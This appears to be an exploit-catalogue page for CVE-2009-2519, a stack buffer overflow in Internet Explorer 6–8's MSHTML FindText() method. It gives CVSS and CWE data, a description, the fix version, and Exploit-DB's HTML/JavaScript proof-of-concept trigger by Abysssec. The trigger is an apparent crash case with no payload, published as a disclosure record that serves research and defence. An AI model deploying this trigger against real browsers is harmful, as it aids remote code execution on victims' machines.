header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Moaub
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Internet Explorer
Affected Version From: 6.0
Affected Version To: 8.0
Patch Exists: YES
Related CWE: CVE-2009-2519
CPE: a:microsoft:internet_explorer
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0622/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Microsoft Internet Explorer MSHTML FindText Processing Issue

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the FindText() method of the MSHTML library. The issue lies in the improper validation of user-supplied data which can result in a stack-based buffer overflow. An attacker can leverage this vulnerability to execute code under the context of the current process.

Mitigation:

Upgrade to version 8.0.6001.18702 or later.
Source

Exploit-DB raw data:

<html>
<body>
<input type="button" value="Crachme!" onclick="Search()"/>
<input  type="text" value="Abysssec" id="Abysssec">&lt;/textarea&gt;

<script type="text/javascript">
function Search(){
var textinput  = document.getElementById("Abysssec");

var textRange = textinput.createTextRange();
textRange.findText(unescape("%u4141"),-1);
textRange.select(document.getElementById('d'));
document.body.appendChild(textinput);
}
</script>
<p id="p">Abysssec</p>
http://www.exploit-db.com/moaub-27-microsoft-internet-explorer-mshtml-findtext-processing-issue/
</body>
</html>
</p>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR